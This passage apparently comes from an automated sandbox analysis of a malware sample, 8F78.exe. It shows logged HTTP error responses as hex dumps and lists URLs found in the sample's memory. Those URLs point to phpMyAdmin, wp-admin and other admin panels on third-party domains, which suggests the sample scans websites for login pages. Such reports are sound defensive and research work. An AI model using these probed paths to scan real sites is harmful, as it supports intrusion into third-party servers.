65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Date: Thu, 21 Dec 2023 04:03:30 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:30 GMTServer: ApacheX-Frame-Options: SAMEORIGINLast-Modified: Mon, 23 Mar 2020 06:02:46 GMTETag: "415-5a17f6251cd80"Accept-Ranges: bytesContent-Length: 1045Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab ef bc 88 55 52 4c ef bc 89 e3 81 8c e3 81 bf e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 7a 65 6e 6c 6f 67 69 63 5f 70 61 67 65 73 2f 63 73 73 2f 64 65 66 61 75 6c 74 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 74 6e 65 6e 74 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 64 65 2d 62 6c 6f 63 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 52 52 4f 52 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 65 73 73 61 67 65 2d 68 65 61 64 69 6e 67 22 3e e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 e3 81 be e3 81 9f e3 81 af e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab e3 81 af e5 ad 98 e5 9c a8 e3 81 97 e3 81 be e3 81 9b e3 82 93 e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 65 73 73 61 67 65 2d 74 78 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e e3 83 bb 55 52 4c e3 80 81 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab e5 90 8d e3 81 ab e3 82 bf e3 82 a4 e3 83 97 e3 83 9f e3 82 b9 e3 81 8c e3 81 aa e3 81 84 e3 81 8b e3 81 94 e7 a2 ba e8 aa 8d e3 81 8f e3 81 a0 e3 81 95 e3 81 84 e3 80 82 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e e3 83 bb e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 e3 81 af e5 89 8a e9 99 a4 e3 81 95 e3 82 8c e3 81 9f e3 81 8b e3 80 81 e7 a7 bb e5 8b 95 e3 81 97 e3 81 9f e5 8f af e8 83 bd e6 80 a7 e3 81 8c e3 81 82 e3 82 8a e3 81 be e3 81 99 e3 80 82 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 7a 65 6e 6c 6f
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:30 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 182Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 14 84 f7 fe 8a 27 bb 3c 34 8c 4d 07 05 22 09 22 31 65 70 c4 b4 a6 24 d0 56 28 1a fe bd 05 16 c7 7b 77 df dd a3 bb e4 76 e6 8f 2a 85 0b bf 16 50 d5 a7 22 3f 43 b0 47 cc 53 9e 21 26 3c d9 9c 63 18 21 a6 65 c0 08 55 ae ef 18 55 b2 11 5e b8 d6 75 92 c5 51 0c a5 71 90 99 49 0b 8a db 91 50 5c 43 f4 69 c4 bc 70 07 f6 97 f1 8a 50 cb b8 92 30 c8 f7 24 47 27 05 d4 f7 02 d0 2a db cf 8d e8 5b 8d f0 6d 46 d0 1e 7a 2d 10 18 0d 4e b5 23 8c 72 f8 c8 21 a4 68 97 91 b5 de 17 2e 6f 91 1f 9e f8 51 3a d1 00 00 00 Data Ascii: M10'<4M""1ep$V({wv*P"?CGS!&<c!eUU^uQqIP\CipP0$G'*[mFz-N#r!h.oQ:
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:30 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:30 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 182Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 14 84 f7 fe 8a 27 bb 3c 34 8c 4d 07 05 22 09 22 31 65 70 c4 b4 a6 24 d0 56 28 1a fe bd 05 16 c7 7b 77 df dd a3 bb e4 76 e6 8f 2a 85 0b bf 16 50 d5 a7 22 3f 43 b0 47 cc 53 9e 21 26 3c d9 9c 63 18 21 a6 65 c0 08 55 ae ef 18 55 b2 11 5e b8 d6 75 92 c5 51 0c a5 71 90 99 49 0b 8a db 91 50 5c 43 f4 69 c4 bc 70 07 f6 97 f1 8a 50 cb b8 92 30 c8 f7 24 47 27 05 d4 f7 02 d0 2a db cf 8d e8 5b 8d f0 6d 46 d0 1e 7a 2d 10 18 0d 4e b5 23 8c 72 f8 c8 21 a4 68 97 91 b5 de 17 2e 6f 91 1f 9e f8 51 3a d1 00 00 00 Data Ascii: M10'<4M""1ep$V({wv*P"?CGS!&<c!eUU^uQqIP\CipP0$G'*[mFz-N#r!h.oQ:
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:30 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 591content-encoding: gzipData Raw: 34 43 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 59 6f e3 36 10 7e cf af 98 75 60 38 46 25 5b a2 2c 5f 91 8d 6e 77 b7 68 1e 8a 16 9b ec 43 5b f4 81 92 28 9b 0d 25 aa 14 1d c7 5b ec 7f ef 50 92 2f c5 49 10 a3 28 6d 1d e4 0c 3f 0e e7 e2 28 78 17 cb 48 6f 72 06 4b 9d 8a f9 45 60 1e 20 68 b6 98 b5 58 d6 9a 5f e0 08 a3 f1 fc 02 b0 05 29 d3 14 a2 25 55 05 d3 b3 d6 4a 27 f6 b8 75 48 ca 68 ca 66 ad 07 ce d6 b9 54 ba 05 91 cc 34 cb 90 75 cd 63 bd 9c c5 ec 81 47 cc 2e 3b 16 f0 8c 6b 4e 85 5d 44 54 b0 99 6b 41 b1 54 3c bb b7 b5 b4 13 ae 67 99 3c 01 ad 64 28 75 71 00 9c 49 9e c5 ec d1 82 4c 26 52 08 b9 36 6f 54 45 4b fe c0 b6 f3 35 d7 82 cd 3f 29 25 15 0c 1c 2f e8 57 03 15 b1 d0 9b ed bb 69 66 fb d6 ae 17 ca 78 03 ff ec ba 25 03 e3 8b a5 9e 82 eb 38 ed eb 23 4a b9 ad 53 84 94 aa 05 cf a6 e0 1c 0f e7 34 8e 79 b6 38 1a ff b6 7b 7b 49 86 04 77 6f 27 34 e5 62 33 05 9b e6 b9 60 76 b1 29 34 4b 2d f8 41 a0 0e 7f a6 d1 6d d9 ff 11 39 2d 68 dd b2 85 64 f0 e5 a6 65 c1 67 a3 41 69 c1 4f 4c 3c 30 cd 23 6a c1 7b 85 66 40 f5 d3 ac b0 0b a6 78 82 33 de 1b 50 f8 20 05 ea ec 53 2a ff e2 ad 03 98 13 23 b7 9b 34 94 a2 75 bc c3 90 46 f7 0b 25 57 59 6c 47 06 69 0a cb 42 d0 2b c7 02 a7 6d 95 8a c2 7b f7 d9 39 3c a5 0b 36 05 45 63 e3 26 0b f3 44 9b 5f 51 0d ae d7 86 c9 04 67 97 78 c4 1f 1f 23 82 93 a3 47 68 85 1b ca a9 c2 39 e0 3b ed ae 75 0a 69 44 10 69 b8 45 f2 c8 d9 40 e3 51 1b 86 de 16 c8 25 e7 23 0d 26 6d f0 fd 3d d2 f0 6c 24 df 6d 83 3b d8 a9 c9 39 5f 26 a3 f0 9d 48 64 70 3e 90 87 6a 22 a3 bd be bd 2d ca c0 7d 2b 94 8b bb f3 76 a6 23 c4 b7 60 64 0c 40 c8 5b 91 c6 7e 1b 06 e3 ff 44 a8 f1 a0 6d f6 f8 36 a1 1a 79 41 16 98 18 25 26 0c c5 04 d5 98 c8 5e cc 0f 4b b7 91 1d ec 35 0b ef b9 b6 0f a3 4f f0 7c 0a 9a 3d ea eb 93 ac 86 82 49 57 88 6d 9c 1e 48 f8 7c 48 3f 03 7a 16 58 1d eb 98 bc 18 55 7b 8d a2 e3 f9 31 5b 58 70 19 7b 8e 33 46 bf bb 74 12 32 18 7a 4d 9d 55 b9 14 cf 0e 14 c9 e9 f9 2c 7d 51 67 97 e6 fc a0 b8 96 6a e8 ae ce e1 9e 73 08 60 da 2e 87 03 5d 69 d9 d8 86 7c b4 8b 25 8d e5 1a 4d b6 08 4d 42 42 b3 ef 6f 4e af 32 3c b8 f5 65 de 79 86 67 a8 55 f1 fb 98 11 cd 35 f1 0c 33 f1 2b 6e bf 9c e2 98 bb 4d 4a bf 29 99 4d f6 ac fe 3d af 62 f4 cc 6d 58 f2 99 d7 e7 74 3c 85 cb 24 49 4e 3b 40 28 55 cc 94 6d d4 be 2a a6 e0 37 51 ec 54 7e 7d 95 e9 35 fa de b1 69 58 48 b1 d2 ec 98 5e 1a cf 6f 9e 9e 82 25 fa c4 70 e9 54 89 54 69 ed 5f 18 29 ec ca f6 4d d4 da 4f 63 aa f4 49 2a f8 02 17 8f d0 b1 98 7a d1 3f be 4f 19 46 36 c8 4c 6c a0 88 14 63 19 d0 2c 86 ab 94 3e da b5 8b 0c 8c 61 ba 0d f7 79 d6 af 4c ab 27 8e 9d f6 11 e9 db 59 82 f0 6c 2f 88 6b 04 69 ca 37 19 fe 1f f2 5d c6 58 9b 71 51 34 e0 ea c0 bf 9c 24 e6 77 6c 8a b2 78 29 f8 57 66 02 75 dc 8c b3 5d 51 e4 b2 b4 bc 48 f5 7c d1 5c 91 8c d9 a9 12 a
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachecontent-type: text/html; charset=utf-8content-encoding: gzipvary: Accept-Encodingcontent-length: 19249date: Thu, 21 Dec 2023 04:03:31 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 49 93 1b 47 96 20 7c 26 cd e6 3f 78 41 56 56 92 0d 23 13 81 35 93 22 b3 86 22 a9 a5 54 a4 68 22 8b 66 53 8b c1 1c 11 0e 20 12 b1 a0 62 01 89 d4 e8 f0 7d a7 3e 54 cd dc e7 d4 69 d6 3a c8 6c 74 aa 3e c9 4c 3c 34 98 7f e4 fb 25 df 7b ee 1e 11 1e 11 8e 25 c9 0c 76 74 0f a0 2a 26 e0 cb 7b ee cf 9f bf cd b7 7b bf b2 03 2b 5e 2d 18 99 c5 9e 7b 76 fb 1e fe 21 2e f5 a7 f7 5b d1 bc 75 76 fb 36 21 f7 66 8c da 67 b7 6f dd be 45 08 fe f4 58 4c 89 35 a3 61 c4 e2 fb ad 24 9e 18 27 58 30 cb 9a c5 f1 c2 60 7f 4d 9c e5 fd d6 6b 23 a1 86 15 78 0b 1a 3b 63 97 b5 88 15 f8 31 f3 a1 9e c3 ee 33 7b ca 78 4d ac 1a 3b b1 cb ce 1e ce 56 63 4a 7a ed de bd 63 91 90 41 f5 a9 c7 ee b7 6c 16 59 a1 b3 88 9d c0 57 60 bd 58 ff 1c 07 24 8a c3 f5 a5 3f 4f 88 ef 30 72 ce 88 17 5c bd f1 d7 3f 12 7f 7d 79 1e 5d fd d0 2a c3 9a b3 d5 ab 20 b4 23 05 10 2f 83 1f f9 27 ff 40 c2 ed db f7 7e 65 18 51 4c c6 6c ea f8 c4 30 38 75 8a 30 97 0e 7b b5 08 c2 58 81 f9 ca b1 e3 d9 7d 9b 2d 1d 8b 19 fc c7 1d e2 d1 d7 8e 97 78 46 64 51 97 dd 37 ef 10 c7 77 62 87 ba 69 c2 51 bb 45 8e cf 32 84 cc b7 53 74 f7 5c c7 9f 93 90 b9 40 41 0b 89 80 83 07 df 3d 3a 65 c7 4b df 3e f2 1c 2b 0c a2 60 12 1f 89 fc 59 c8 26 f7 5b 38 26 77 8f 8f cf a9 6f cd 13 d7 99 1f 45 f3 63 c7 9b 1e 4f e8 12 8b 61 d9 df 9a 83 61 bb 7d da eb f7 bb 82 54 39 a6 68 06 5d b2 92 98 54 51 be 36 de 17 4d 99 a6 9c a4 39 6e ba 58 b8 cc 88 83 c4 9a 49 54 91 73 c1 a2 fb 2d f3 a4 fd 1a fe af a2 8e ca b8 93 85 1b 50 fb 38 8a e3 19 f3 18 b3 9d 38 08 8f cd c1 a4 37 3c 69 4f 4e c6 27 c3 49 a7 6d b3 61 af d7 6b b7 c7 ed ee d8 1a b7 fb dd a3 85 3f e5 ad ec 74 fa d0 4c 3e 12 82 09 b6 12 1f 6a e5 6d 1b bc 36 07 d7 6f 59 ff 94 0d ed 4e bf 4d db bd 93 71 d7 6c 0f 06 e3 81 d5 ef 9c 9c f6 e9 49 a7 33 a4 37 d0 b2 6e e7 75 b7 73 fd 96 9d 52 cb ec 98 43 eb 04 e8 36 1c 8e 27 9d 31 9d c0 bf d0 b6 ce c4 1c f7 db 7b b5 cc a3 be 33 61 51 9c a2 df 30 3c c7 91 13 b3 a3 57 6c 9c 96 57 01 6b c1 46 f3 0a 17 ee d7 ad 4e 9f b1 93 b1 79 02 5d ea 9f 8e d9 90 4d c6 e3 7e af d7 6f 77 3b 96 69 d1 fe 51 b4 2c 76 cb 0a dc 20 bc df fa 88 f5 7b 76 67 90 b7 46 11 01 5e 84 2c eb 58 14 85 14 c8 3e 7f e2 4c 15 71 70 0d 3e 3d 1e 87 c1 ab 88 85 02 c6 d1 6b cf ad 52 42 23 22 8a 53 37 5e b9 2c 9a 31 16 97 a9 33 81 16 45 47 d3 20 98 ba 8c 2e 9c e8 08 c4 f4 b1 15 45 bf 9d 50 cf 71 57 f7 5f 06 ae 3b 0f 42 ff 6e c8 a6 89 4b c3 16 f1 a0 61 14 66 a4 eb 56 04 84 16 4b b9 97 bc 73 d1 71 1c 52 3f 9a 04 a1 c7 c2 63 1a 81 12 89 8e 2d 6a cd 98 c8 37 ba d4 b6 4f 27 c0 fc 47 d0 98 12 52 f1 41 51 0c e8 85 26 90 9c 1e b3 d7 31 60 5b 52 91 9a 8d 0c 21 4b 1a 12 00 19 07 16 0d e3 11 b0 94 c7 47 86 dc 27 e6 a7 85 42 e3 e7 94 25 2f 42 67 3a 65 e1 37
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Date: Thu, 21 Dec 2023 04:03:40 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Dec 2023 04:04:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Dec 2023 04:04:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Dec 2023 04:05:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Dec 2023 04:05:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Dec 2023 04:05:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Dec 2023 04:05:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/.net:21
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/7com
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/=iso-8859-1
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/PhpMyAdmin/)=
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/eak.dee
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/eflate
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/ever.sk
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/pma/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/pma/Admin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/wp-admin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abatek.sk/wp-admin/hp
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/.dekde=
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/PhpMyAdmin/v
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/administrator/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/administrator/4
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/administrator/index.phpj
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/ndi.it
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aexoden.com/phpMyAdmin/
